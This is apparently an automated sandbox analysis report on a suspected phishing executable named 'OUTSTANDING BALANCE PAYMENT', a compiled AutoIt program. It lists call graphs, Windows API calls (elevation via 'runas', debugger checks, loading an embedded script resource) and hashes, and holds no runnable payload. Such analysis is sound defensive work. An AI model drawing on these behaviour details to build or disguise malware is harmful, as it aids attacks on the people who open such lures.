95457->95504 95459 2a0fca 95459->95328 95460->95328 95461->95367 95463 28bdfa 48 API calls 95462->95463 95464 2861b1 95463->95464 95464->95420 95466 284517 83 API calls 95465->95466 95467 2cc405 95466->95467 95500 2cc56d 94 API calls 2 library calls 95467->95500 95469 2cc417 95470 2844ed 64 API calls 95469->95470 95496 2cc41b 95469->95496 95471 2cc432 95470->95471 95472 2844ed 64 API calls 95471->95472 95473 2cc442 95472->95473 95474 2844ed 64 API calls 95473->95474 95475 2cc45d 95474->95475 95476 2844ed 64 API calls 95475->95476 95477 2cc478 95476->95477 95478 284517 83 API calls 95477->95478 95479 2cc48f 95478->95479 95480 2a395c _W_store_winword 47 API calls 95479->95480 95481 2cc496 95480->95481 95482 2a395c _W_store_winword 47 API calls 95481->95482 95483 2cc4a0 95482->95483 95484 2844ed 64 API calls 95483->95484 95485 2cc4b4 95484->95485 95501 2cbf5a GetSystemTimeAsFileTime 95485->95501 95487 2cc4c7 95488 2cc4dc 95487->95488 95489 2cc4f1 95487->95489 95490 2a1c9d _free 47 API calls 95488->95490 95491 2cc556 95489->95491 95492 2cc4f7 95489->95492 95494 2cc4e2 95490->95494 95493 2a1c9d _free 47 API calls 95491->95493 95502 2cb965 118 API calls __fcloseall 95492->95502 95493->95496 95497 2a1c9d _free 47 API calls 95494->95497 95496->95436 95496->95438 95497->95496 95498 2cc54e 95499 2a1c9d _free 47 API calls 95498->95499 95499->95496 95500->95469 95501->95487 95502->95498 95503->95457 95504->95459 95505->95455 95507 2af8a0 __ftell_nolock 95506->95507 95508 2840b4 GetLongPathNameW 95507->95508 95509 286a63 48 API calls 95508->95509 95510 2840dc 95509->95510 95511 2849a0 95510->95511 95512 28d7f7 48 API calls 95511->95512 95513 2849b2 95512->95513 95514 28660f 49 API calls 95513->95514 95515 2849bd 95514->95515 95516 2849c8 95515->95516 95517 2f2e35 95515->95517 95519 2864cf 48 API calls 95516->95519 95521 2f2e4f 95517->95521 95564 29d35e 60 API calls 95517->95564 95520 2849d4 95519->95520 95558 2828a6 95520->95558 95564->95517 95716 28f030 95719 293b70 95716->95719 95718 28f03c 95720 293bc8 95719->95720 95741 2942a5 95719->95741 95721 293bef 95720->95721 95723 2f6fd1 95720->95723 95724 2f6f7e 95720->95724 95732 2f6f9b 95720->95732 95722 29f4ea 48 API calls 95721->95722 95726 293c18 95722->95726 95799 2dceca 331 API calls Mailbox 95723->95799 95724->95721 95728 2f6f87 95724->95728 95727 29f4ea 48 API calls 95726->95727 95765 293c2c __NMSG_WRITE ___crtGetEnvironmentStringsW 95727->95765 95796 2dd552 331 API calls Mailbox 95728->95796 95729 2f6fbe 95798 2ccc5c 86 API calls 4 library calls 95729->95798 95732->95729 95797 2dda0e 331 API calls 2 library calls 95732->95797 95733 2942f2 95818 2ccc5c 86 API calls 4 library calls 95733->95818 95736 2f73b0 95736->95718 95737 2f737a 95817 2ccc5c 86 API calls 4 library calls 95737->95817 95738 2f7297 95807 2ccc5c 86 API calls 4 library calls 95738->95807 95811 2ccc5c 86 API calls 4 library calls 95741->95811 95743 2f707e 95800 2ccc5c 86 API calls 4 library calls 95743->95800 95745 2940df 95808 2ccc5c 86 API calls 4 library calls 95745->95808 95747 28d6e9 55 API calls 95747->95765 95749 29dce0 53 API calls 95749->95765 95751 28d645 53 API calls 95751->95765 95754 2f72d2 95809 2ccc5c 86 API calls 4 library calls 95754->95809 95756 2f7350 95815 2ccc5c 86 API calls 4 library calls 95756->95815 95758 2f7363 95816 2ccc5c 86 API calls 4 library calls 95758->95816 95760 2f72e9 95810 2ccc5c 86 API calls 4 library calls 95760->95810 95763 286a63 48 API calls 95763->95765 95765->95733 95765->95737 95765->95738 95765->95741 95765->95743 95765->95745 95765->95747 95765->95749 95765->95751 95765->95754 95765->95756 95765->95758 95765->95760 95765->95763 95766 28fe30 331 API calls 95765->95766 95767 2f714c 95765->95767 95768 28d286 48 API calls 95765->95768 95769 29f4ea 48 API calls 95765->95769 95770 29c050 48 API calls 95765->95770 95772 2f733f 95765->95772 95773 293f2b 95765->95773 95774 286eed 48 API calls 95765->95774 95778 2f71e1 95765->95778 95782 29ee75 48 API calls 95765->95782 95791 28d9a0 53 API calls __cinit 95765->95791 95792 28d83d 53 API calls 95765->95792 95793 28cdb9 48 API calls 95765->95793 95794 29c15c 48 API calls 95765->95794 95795 29becb 331 API calls 95765->95795 95801 28dcae 50 API calls Mailbox 95765->95801 95802 2dccdc 48 API calls 95765->95802 95803 2ca1eb 50 API calls 95765->95803 95766->95765 95804 2dccdc 48 API calls 95767->95804 95768->95765 95769->95765 95770->95765 95814 2ccc5c 86 API calls 4 library calls 95772->95814 95773->95718 95774->95765 95777 2f71a1 95806 29c15c 48 API calls 95777->95806 95778->95773 95813 2ccc5c 86 API calls 4 library calls 95778->95813 95779 2f715f 95779->95777 95805 2dccdc 48 API calls 95779->95805 95782->95765 95785 2f71ce 95786 29c050 48 API calls 95785->95786 95788 2f71d6 95786->95788 95787 2f71ab 95787->95741 95787->95785 95788->95778 95789 2f7313 95788->95789 95812 2ccc5c 86 API calls 4 library calls 95789->95812 95791->95765 95792->95765 95793->95765 95794->95765 95795->95765 95796->95773 95797->95729 95798->95723 95799->95765 95800->95773 95801->95765 95802->95765 95803->95765 95804->95779 95805->95779 95806->95787 95807->95745 95808->95773 95809->95760 95810->95773 95811->95773 95812->95773 95813->95773 95814->95773 95815->95773 95816->95773 95817->95773 95818->95736 95819 1227bb8 95820 1225808 GetPEB 95819->95820 95821 1227c57 95820->95821 95833 1227aa8 95821->95833 95834 1227ab1 Sleep 95833->95834 95835 1227abf 95834->95835

                                                                  Executed Functions

                                                                  Function 002AB043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 745 2ab043-2ab080 call 2af8a0 748 2ab089-2ab08b 745->748 749 2ab082-2ab084 745->749 751 2ab0ac-2ab0d9 748->751 752 2ab08d-2ab0a7 call 2a7bda call 2a7c0e call 2a6e10 748->752 750 2ab860-2ab86c call 2aa70c 749->750 753 2ab0db-2ab0de 751->753 754 2ab0e0-2ab0e7 751->754 752->750 753->754 757 2ab10b-2ab110 753->757 758 2ab0e9-2ab100 call 2a7bda call 2a7c0e call 2a6e10 754->758 759 2ab105 754->759 763 2ab11f-2ab12d call 2b3bf2 757->763 764 2ab112-2ab11c call 2af82f 757->764 793 2ab851-2ab854 758->793 759->757 774 2ab44b-2ab45d 763->774 775 2ab133-2ab145 763->775 764->763 779 2ab7b8-2ab7d5 WriteFile 774->779 780 2ab463-2ab473 774->780 775->774 778 2ab14b-2ab183 call 2a7a0d GetConsoleMode 775->778 778->774 797 2ab189-2ab18f 778->797 786 2ab7e1-2ab7e7 GetLastError 779->786 787 2ab7d7-2ab7df 779->787 783 2ab55a-2ab55f 780->783 784 2ab479-2ab484 780->784 788 2ab663-2ab66e 783->788 789 2ab565-2ab56e 783->789 791 2ab48a-2ab49a 784->791 792 2ab81b-2ab833 784->792 794 2ab7e9 786->794 787->794 788->792 801 2ab674 788->801 789->792 795 2ab574 789->795 798 2ab4a0-2ab4a3 791->798 799 2ab83e-2ab84e call 2a7c0e call 2a7bda 792->799 800 2ab835-2ab838 792->800 796 2ab85e-2ab85f 793->796 802 2ab7ef-2ab7f1 794->802 805 2ab57e-2ab595 795->805 796->750 806 2ab199-2ab1bc GetConsoleCP 797->806 807 2ab191-2ab193 797->807 808 2ab4e9-2ab520 WriteFile 798->808 809 2ab4a5-2ab4be 798->809 799->793 800->799 810 2ab83a-2ab83c 800->810 811 2ab67e-2ab693 801->811 803 2ab7f3-2ab7f5 802->803 804 2ab856-2ab85c 802->804 803->792 813 2ab7f7-2ab7fc 803->813 804->796 814 2ab59b-2ab59e 805->814 815 2ab1c2-2ab1ca 806->815 816 2ab440-2ab446 806->816 807->774 807->806 808->786 819 2ab526-2ab538 808->819 817 2ab4cb-2ab4e7 809->817 818 2ab4c0-2ab4ca 809->818 810->796 820 2ab699-2ab69b 811->820 823 2ab7fe-2ab810 call 2a7c0e call 2a7bda 813->823 824 2ab812-2ab819 call 2a7bed 813->824 825 2ab5de-2ab627 WriteFile 814->825 826 2ab5a0-2ab5b6 814->826 827 2ab1d4-2ab1d6 815->827 816->803 817->798 817->808 818->817 819->802 828 2ab53e-2ab54f 819->828 829 2ab6d8-2ab719 WideCharToMultiByte 820->829 830 2ab69d-2ab6b3 820->830 823->793 824->793 825->786 839 2ab62d-2ab645 825->839 836 2ab5b8-2ab5ca 826->836 837 2ab5cd-2ab5dc 826->837 840 2ab36b-2ab36e 827->840 841 2ab1dc-2ab1fe 827->841 828->791 842 2ab555 828->842 829->786 835 2ab71f-2ab721 829->835 831 2ab6c7-2ab6d6 830->831 832 2ab6b5-2ab6c4 830->832 831->820 831->829 832->831 846 2ab727-2ab75a WriteFile 835->846 836->837 837->814 837->825 839->802 848 2ab64b-2ab658 839->848 843 2ab370-2ab373 840->843 844 2ab375-2ab3a2 840->844 849 2ab200-2ab215 841->849 850 2ab217-2ab223 call 2a1688 841->850 842->802 843->844 851 2ab3a8-2ab3ab 843->851 844->851 853 2ab77a-2ab78e GetLastError 846->853 854 2ab75c-2ab776 846->854 848->805 855 2ab65e 848->855 856 2ab271-2ab283 call 2b40f7 849->856 869 2ab269-2ab26b 850->869 870 2ab225-2ab239 850->870 858 2ab3ad-2ab3b0 851->858 859 2ab3b2-2ab3c5 call 2b5884 851->859 863 2ab794-2ab796 853->863 854->846 861 2ab778 854->861 855->802 874 2ab289 856->874 875 2ab435-2ab43b 856->875 858->859 865 2ab407-2ab40a 858->865 859->786 879 2ab3cb-2ab3d5 859->879 861->863 863->794 868 2ab798-2ab7b0 863->868 865->827 877 2ab410 865->877 868->811 876 2ab7b6 868->876 869->856 871 2ab23f-2ab254 call 2b40f7 870->871 872 2ab412-2ab42d 870->872 871->875 885 2ab25a-2ab267 871->885 872->875 880 2ab28f-2ab2c4 WideCharToMultiByte 874->880 875->794 876->802 877->875 882 2ab3fb-2ab401 879->882 883 2ab3d7-2ab3ee call 2b5884 879->883 880->875 884 2ab2ca-2ab2f0 WriteFile 880->884 882->865 883->786 890 2ab3f4-2ab3f5 883->890 884->786 887 2ab2f6-2ab30e 884->887 885->880 887->875 889 2ab314-2ab31b 887->889 889->882 891 2ab321-2ab34c WriteFile 889->891 890->882 891->786 892 2ab352-2ab359 891->892 892->875 893 2ab35f-2ab366 892->893 893->882
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3be95956dd99e62b61d04aa729f8e78b5d1dd058a9556c5e7118edca1fd03cf9
                                                                  • Instruction ID: 1fde47307401c4caf02ac3f9d4e0e386024b64241e7d058353278e3b697d54fc
                                                                  • Opcode Fuzzy Hash: 3be95956dd99e62b61d04aa729f8e78b5d1dd058a9556c5e7118edca1fd03cf9
                                                                  • Instruction Fuzzy Hash: EB327075B222198FCB268F54DC516E9B7B9FF4B310F0840D9E40AA7A52DB709E90CF52
                                                                  Function 00283D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00283AA3,?), ref: 00283D45
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,00283AA3,?), ref: 00283D57
                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00341148,00341130,?,?,?,?,00283AA3,?), ref: 00283DC8
                                                                    • Part of subcall function 00286430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00283DEE,00341148,?,?,?,?,?,00283AA3,?), ref: 00286471
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00283AA3,?), ref: 00283E48
                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003328F4,00000010), ref: 002F1CCE
                                                                  • SetCurrentDirectoryW.KERNEL32(?,00341148,?,?,?,?,?,00283AA3,?), ref: 002F1D06
                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0031DAB4,00341148,?,?,?,?,?,00283AA3,?), ref: 002F1D89
                                                                  • ShellExecuteW.SHELL32(00000000,?,?,?,?,00283AA3), ref: 002F1D90
                                                                    • Part of subcall function 00283E6E: GetSysColorBrush.USER32(0000000F), ref: 00283E79
                                                                    • Part of subcall function 00283E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00283E88
                                                                    • Part of subcall function 00283E6E: LoadIconW.USER32(00000063), ref: 00283E9E
                                                                    • Part of subcall function 00283E6E: LoadIconW.USER32(000000A4), ref: 00283EB0
                                                                    • Part of subcall function 00283E6E: LoadIconW.USER32(000000A2), ref: 00283EC2
                                                                    • Part of subcall function 00283E6E: RegisterClassExW.USER32(?), ref: 00283F30
                                                                    • Part of subcall function 002836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002836E6
                                                                    • Part of subcall function 002836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00283707
                                                                    • Part of subcall function 002836B8: ShowWindow.USER32(00000000,?,?,?,?,00283AA3,?), ref: 0028371B
                                                                    • Part of subcall function 002836B8: ShowWindow.USER32(00000000,?,?,?,?,00283AA3,?), ref: 00283724
                                                                    • Part of subcall function 00284FFC: _memset.LIBCMT ref: 00285022
                                                                    • Part of subcall function 00284FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002850CB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                  • String ID: ()3$This is a third-party compiled AutoIt script.$runas
                                                                  • API String ID: 438480954-1656438890
                                                                  • Opcode ID: b5a316ceb72c823d2663a27fd98caa864113d9c4506ae57637c8b94b5855734f
                                                                  • Instruction ID: 3352822bec0da19b241abf35d4b28aebe11217f1be306d8cf30c2d40c4484aa7
                                                                  • Opcode Fuzzy Hash: b5a316ceb72c823d2663a27fd98caa864113d9c4506ae57637c8b94b5855734f
                                                                  • Instruction Fuzzy Hash: 3851263C926649AACB13FBF4DC45EEE7BB9AF06B00F004065F5016A1D2DE7056A58F21
                                                                  Function 0029DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1080 29ddc0-29de4f call 28d7f7 GetVersionExW call 286a63 call 29dfb4 call 286571 1089 2f24c8-2f24cb 1080->1089 1090 29de55-29de56 1080->1090 1093 2f24cd 1089->1093 1094 2f24e4-2f24e8 1089->1094 1091 29de58-29de63 1090->1091 1092 29de92-29dea2 call 29df77 1090->1092 1097 29de69-29de6b 1091->1097 1098 2f244e-2f2454 1091->1098 1111 29dea4-29dec1 GetCurrentProcess call 29df5f 1092->1111 1112 29dec7-29dee1 1092->1112 1100 2f24d0 1093->1100 1095 2f24ea-2f24f3 1094->1095 1096 2f24d3-2f24dc 1094->1096 1095->1100 1103 2f24f5-2f24f8 1095->1103 1096->1094 1104 2f2469-2f2475 1097->1104 1105 29de71-29de74 1097->1105 1101 2f245e-2f2464 1098->1101 1102 2f2456-2f2459 1098->1102 1100->1096 1101->1092 1102->1092 1103->1096 1107 2f247f-2f2485 1104->1107 1108 2f2477-2f247a 1104->1108 1109 29de7a-29de89 1105->1109 1110 2f2495-2f2498 1105->1110 1107->1092 1108->1092 1115 2f248a-2f2490 1109->1115 1116 29de8f 1109->1116 1110->1092 1117 2f249e-2f24b3 1110->1117 1111->1112 1131 29dec3 1111->1131 1113 29df31-29df3b GetSystemInfo 1112->1113 1114 29dee3-29def7 call 29e00c 1112->1114 1120 29df0e-29df1a 1113->1120 1128 29df29-29df2f GetSystemInfo 1114->1128 1129 29def9-29df01 call 29dff4 GetNativeSystemInfo 1114->1129 1115->1092 1116->1092 1122 2f24bd-2f24c3 1117->1122 1123 2f24b5-2f24b8 1117->1123 1125 29df1c-29df1f FreeLibrary 1120->1125 1126 29df21-29df26 1120->1126 1122->1092 1123->1092 1125->1126 1130 29df03-29df07 1128->1130 1129->1130 1130->1120 1134 29df09-29df0c FreeLibrary 1130->1134 1131->1112 1134->1120
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 0029DDEC
                                                                  • GetCurrentProcess.KERNEL32(00000000,0031DC38,?,?), ref: 0029DEAC
                                                                  • GetNativeSystemInfo.KERNELBASE(?,0031DC38,?,?), ref: 0029DF01
                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0029DF0C
                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0029DF1F
                                                                  • GetSystemInfo.KERNEL32(?,0031DC38,?,?), ref: 0029DF29
                                                                  • GetSystemInfo.KERNEL32(?,0031DC38,?,?), ref: 0029DF35
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                  • String ID:
                                                                  • API String ID: 3851250370-0
                                                                  • Opcode ID: b7c81aad403fd9bb8ad4da3368cdd837de9089c4e376af9d9e7707f6834491b5
                                                                  • Instruction ID: 007023f8e1439aac76333092b6e61574df2fdb4166242edd2d96ffda5590ffc8
                                                                  • Opcode Fuzzy Hash: b7c81aad403fd9bb8ad4da3368cdd837de9089c4e376af9d9e7707f6834491b5
                                                                  • Instruction Fuzzy Hash: 3C61D57182A385CFCF15CF6898C11E9BFB4AF2A300F1949E9D8859F247C674C918DB65
                                                                  Function 0028406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1152 28406b-284083 CreateStreamOnHGlobal 1153 2840a3-2840a6 1152->1153 1154 284085-28409c FindResourceExW 1152->1154 1155 2f4f16-2f4f25 LoadResource 1154->1155 1156 2840a2 1154->1156 1155->1156 1157 2f4f2b-2f4f39 SizeofResource 1155->1157 1156->1153 1157->1156 1158 2f4f3f-2f4f4a LockResource 1157->1158 1158->1156 1159 2f4f50-2f4f6e 1158->1159 1159->1156
                                                                  APIs
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0028449E,?,?,00000000,00000001), ref: 0028407B
                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0028449E,?,?,00000000,00000001), ref: 00284092
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,0028449E,?,?,00000000,00000001,?,?,?,?,?,?,002841FB), ref: 002F4F1A
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,0028449E,?,?,00000000,00000001,?,?,?,?,?,?,002841FB), ref: 002F4F2F
                                                                  • LockResource.KERNEL32(0028449E,?,?,0028449E,?,?,00000000,00000001,?,?,?,?,?,?,002841FB,00000000), ref: 002F4F42
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                  • String ID: SCRIPT
                                                                  • API String ID: 3051347437-3967369404
                                                                  • Opcode ID: 5a7691205abc4e68990c339ae455bb52ddf79351f1954c02f1cb464f8ee50bfc
                                                                  • Instruction ID: 85ca481985e1c5cca72ee0ba8e21410172af23d6813d52f52752f4c4f7bf1615
                                                                  • Opcode Fuzzy Hash: 5a7691205abc4e68990c339ae455bb52ddf79351f1954c02f1cb464f8ee50bfc
                                                                  • Instruction Fuzzy Hash: BD117C74211706BFE726AB65EC48F677BBDEBC5B51F10852EF602862A0DB71DC108A20
                                                                  Function 00293B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                  • String ID: @$ 4$ 4$ 4
                                                                  • API String ID: 3728558374-1609081169
                                                                  • Opcode ID: eb0cd9c76503465896f72b6befe96bd83748017622405b96bff4d6b43fe5c01a
                                                                  • Instruction ID: db9b77cef4051dc81d46e56d12fb72adb7ab4f37e3c6b258a8f200062ac7747d
                                                                  • Opcode Fuzzy Hash: eb0cd9c76503465896f72b6befe96bd83748017622405b96bff4d6b43fe5c01a
                                                                  • Instruction Fuzzy Hash: 9C72AE34D2420A9FCF14EF94C481EBEB7B5EF48340F14806AE909AB291D771AE65CF91
                                                                  Function 002C6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,002F2F49), ref: 002C6CB9
                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 002C6CCA
                                                                  • FindClose.KERNEL32(00000000), ref: 002C6CDA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                  • String ID:
                                                                  • API String ID: 48322524-0
                                                                  • Opcode ID: ce8904f4fe4b6b8ec7d05347998a36b3af23f4e84541d7d8fd72a98b412d5416
                                                                  • Instruction ID: f16b9c4fc56265054d389d01c82f28af62980b3f36bbaade1ac01a3ad1e24687
                                                                  • Opcode Fuzzy Hash: ce8904f4fe4b6b8ec7d05347998a36b3af23f4e84541d7d8fd72a98b412d5416
                                                                  • Instruction Fuzzy Hash: 71E0D83182141157C21467B8EC0D9EA37ACDE05339F10070BF471C11D0EB74DA1045D5
                                                                  Function 00293200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: 4
                                                                  • API String ID: 3964851224-1342260363
                                                                  • Opcode ID: 7b9000bdb849b9d01b94361d56e299518019c4f541356ac49aa3573397c05624
                                                                  • Instruction ID: d22ad57de054cc0ead6b83d67b323e70e29fbabbccccd132371de75c7e085448
                                                                  • Opcode Fuzzy Hash: 7b9000bdb849b9d01b94361d56e299518019c4f541356ac49aa3573397c05624
                                                                  • Instruction Fuzzy Hash: 7C928D706283419FDB14DF18C494B6AF7E1BF88308F14886DE98A8B392D771ED65CB52
                                                                  Function 0028E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028E959
                                                                  • timeGetTime.WINMM ref: 0028EBFA
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028ED2E
                                                                  • TranslateMessage.USER32(?), ref: 0028ED3F
                                                                  • DispatchMessageW.USER32(?), ref: 0028ED4A
                                                                  • LockWindowUpdate.USER32(00000000), ref: 0028ED79
                                                                  • DestroyWindow.USER32 ref: 0028ED85
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028ED9F
                                                                  • Sleep.KERNEL32(0000000A), ref: 002F5270
                                                                  • TranslateMessage.USER32(?), ref: 002F59F7
                                                                  • DispatchMessageW.USER32(?), ref: 002F5A05
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002F5A19
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
